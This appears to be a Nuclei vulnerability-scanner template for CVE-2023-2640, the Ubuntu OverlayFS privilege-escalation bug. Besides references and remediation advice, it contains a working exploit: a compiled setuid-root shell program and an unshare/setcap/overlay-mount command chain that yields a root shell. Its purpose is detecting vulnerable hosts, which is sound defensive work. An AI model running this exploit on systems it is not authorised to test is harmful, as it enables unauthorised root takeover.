id: CVE-2023-2640 info: name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel author: princechaddha severity: high description: | A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system. impact: | An attacker with local access can gain elevated privileges on the affected system. remediation: | Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability. reference: - http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640 - https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability - https://ubuntu.com/security/notices/USN-6250-1 - https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-2640 cwe-id: CWE-863 epss-score: 0.00047 epss-percentile: 0.14754 cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: canonical product: ubuntu_linux tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical self-contained: true code: - engine: - sh - bash source: | id - engine: - sh - bash source: | cd /tmp echo '#include \n#include \n#include \n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c gcc test.c -o test unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;" matchers: - type: dsl dsl: - '!contains(code_1_response, "(root)")' - 'contains(code_2_response, "(root)")' condition: and # digest: 4a0a0047304502205d80f4f4d3107359398f18979d89ebc1f65ea74c7566a11b5558e54212b5c18d022100d17f1784c392972230ff7f2465c6c936768fd45a480aecfd6559f3c5cd51dffc:922c64590222798bb761d5b6d8e72950